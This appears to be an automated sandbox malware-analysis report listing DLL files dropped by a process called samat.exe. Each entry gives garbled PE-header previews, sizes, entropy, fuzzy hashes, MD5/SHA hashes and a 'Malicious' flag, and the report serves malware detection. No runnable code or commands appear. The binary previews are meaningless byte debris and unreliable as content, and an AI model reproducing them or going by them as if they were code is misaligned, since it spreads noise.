                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):84992
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.064677498000638
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
                                                                                                                                                                                                                                                                                    MD5:8A0C0AA820E98E83AC9B665A9FD19EAF
                                                                                                                                                                                                                                                                                    SHA1:6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
                                                                                                                                                                                                                                                                                    SHA-256:4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
                                                                                                                                                                                                                                                                                    SHA-512:52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.675380950473425
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
                                                                                                                                                                                                                                                                                    MD5:44B930B89CE905DB4716A548C3DB8DEE
                                                                                                                                                                                                                                                                                    SHA1:948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
                                                                                                                                                                                                                                                                                    SHA-256:921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
                                                                                                                                                                                                                                                                                    SHA-512:79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.625428549874022
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
                                                                                                                                                                                                                                                                                    MD5:F24F9356A6BDD29B9EF67509A8BC3A96
                                                                                                                                                                                                                                                                                    SHA1:A26946E938304B4E993872C6721EB8CC1DCBE43B
                                                                                                                                                                                                                                                                                    SHA-256:034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
                                                                                                                                                                                                                                                                                    SHA-512:C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):120400
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                                                                    MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                                                                    SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                                                                    SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                                                                    SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):49744
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.701724666218339
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                                                                                                    MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                                                                                                    SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                                                                                                    SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                                                                                                    SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):70928
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.242470629630265
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:FCIB0WWuqkJS86D6rznO6uqM+lY5ZkesIcydIJvn/5YiSyvT2ETh:FCY0WStDwnOLYY5ZkeddIJvnx7Sy75h
                                                                                                                                                                                                                                                                                    MD5:80083B99812171FEA682B1CF38026816
                                                                                                                                                                                                                                                                                    SHA1:365FB5B0C652923875E1C7720F0D76A495B0E221
                                                                                                                                                                                                                                                                                    SHA-256:DBEAE7CB6F256998F9D8DE79D08C74D716D819EB4473B2725DBE2D53BA88000A
                                                                                                                                                                                                                                                                                    SHA-512:33419B9E18E0099DF37D22E33DEBF15D57F4248346B17423F2B55C8DA7CBE62C19AA0BB5740CFAAC9BC6625B81C54367C0C476EAECE71727439686567F0B1234
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z...........%.....................................................K...................I...........Rich...................PE..d......g.........." ...).d................................................... ............`.........................................`...P.......d......................../.............T...............................@...............(............................text...)b.......d.................. ..`.rdata...O.......P...h..............@..@.data...`...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):84240
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.607563436050078
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                                                                                                    MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                                                                                                    SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                                                                                                    SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                                                                                                    SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):179200
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.189919896183334
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:X3LjFuaTzDGA3GrJwUdoSPhpRv9JUizQWS7LkSTLkKWgFIPXD0:X3QaT3GA3NSPhDsizTikSTLLWgF0z0
                                                                                                                                                                                                                                                                                    MD5:5CBA92E7C00D09A55F5CBADC8D16CD26
                                                                                                                                                                                                                                                                                    SHA1:0300C6B62CD9DB98562FDD3DE32096AB194DA4C8
                                                                                                                                                                                                                                                                                    SHA-256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
                                                                                                                                                                                                                                                                                    SHA-512:7AB432C8774A10F04DDD061B57D07EBA96481B5BB8C663C6ADE500D224C6061BC15D17C74DA20A7C3CEC8BBF6453404D553EBAB22D37D67F9B163D7A15CF1DED
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i..#-p.p-p.p-p.p$..p!p.p=.q/p.p=.zp)p.p=.q)p.p=.q%p.p=.q!p.pf..q)p.p9.q.p.p-p.p.p.pe..q)p.p$..p,p.pe..q,p.pe.xp,p.pe..q,p.pRich-p.p........................PE..d..._..f.........." ...).....B......@........................................0............`..........................................h..l....i..................T............ ......0O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...n..............@....pdata..T...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):131344
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.311142284249784
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                                                                                                    MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                                                                                                    SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                                                                                                    SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                                                                                                    SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):277776
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.5855511991551
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                                                                                                    MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                                                                                                    SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                                                                                                    SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                                                                                                    SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):64272
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.220967684620152
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                                                                                                    MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                                                                                                    SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                                                                                                    SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                                                                                                    SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):157968
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.854644275249963
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                                                                                                    MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                                                                                                    SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                                                                                                    SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                                                                                                    SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):35600
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.416657776501014
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:6wehui7ZmQW/3OUDxEiNIJntJ5YiSyvSJz2Ec:whuilG+UDxEiNIJntX7Sy+zO
                                                                                                                                                                                                                                                                                    MD5:705AC24F30DC9487DC709307D15108ED
                                                                                                                                                                                                                                                                                    SHA1:E9E6BA24AF9947D8995392145ADF62CAC86BA5D8
                                                                                                                                                                                                                                                                                    SHA-256:59134B754C6ACA9449E2801E9E7ED55279C4F1ED58FE7A7A9F971C84E8A32A6C
                                                                                                                                                                                                                                                                                    SHA-512:F5318EBB91F059F0721D75D576B39C7033D566E39513BAD8E7E42CCC922124A5205010415001EE386495F645238E2FF981A8B859F0890DC3DA4363EB978FDBA7
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.Y)v.7zv.7zv.7z..zt.7zf,6{t.7zf,4{u.7zf,3{~.7zf,2{{.7z>-6{t.7zv.6z..7z=.6{s.7z>-:{t.7z>-7{w.7z>-.zw.7z>-5{w.7zRichv.7z........PE..d......g.........." ...). ...>......@...............................................%.....`......................................... E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata..6 ...0..."...$..............@..@.data...p....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):55568
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.3313243577146485
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:+kMm7HdG/l5fW3UguCE+eRIJWtd7SyJds:+wIQUFCEbRIJWtd6
                                                                                                                                                                                                                                                                                    MD5:A72527454DD6DA346DDB221FC729E3D4
                                                                                                                                                                                                                                                                                    SHA1:0276387E3E0492A0822DB4EABE23DB8C25EF6E6F
                                                                                                                                                                                                                                                                                    SHA-256:404353D7B867749FA2893033BD1EBF2E3F75322D4015725D697CFA5E80EC9D0F
                                                                                                                                                                                                                                                                                    SHA-512:FEFB543D20520F86B63E599A56E2166599DFA117EDB2BEB5E73FC8B43790543702C280A05CCFD9597C0B483F637038283DD48EF8C88B4EA6BAC411EC0043B10A
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.{X/.(X/.(X/.(QW_(\/.(H..)Z/.(H..)[/.(H..)P/.(H..)T/.(...)Z/.(X/.(//.(.W.)]/.(.W.)Y/.(...)Y/.(...)Y/.(..3(Y/.(...)Y/.(RichX/.(........................PE..d.....g.........." ...).L...`......@................................................}....`.............................................X................................/......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata...8...`...:...P..............@..@.data...@...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):33552
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.446391764486538
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                                                                                                    MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                                                                                                    SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
                                                                                                                                                                                                                                                                                    SHA-256:B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
                                                                                                                                                                                                                                                                                    SHA-512:783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):83728
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.331814573029388
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
                                                                                                                                                                                                                                                                                    MD5:FE896371430BD9551717EF12A3E7E818
                                                                                                                                                                                                                                                                                    SHA1:E2A7716E9CE840E53E8FC79D50A77F40B353C954
                                                                                                                                                                                                                                                                                    SHA-256:35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
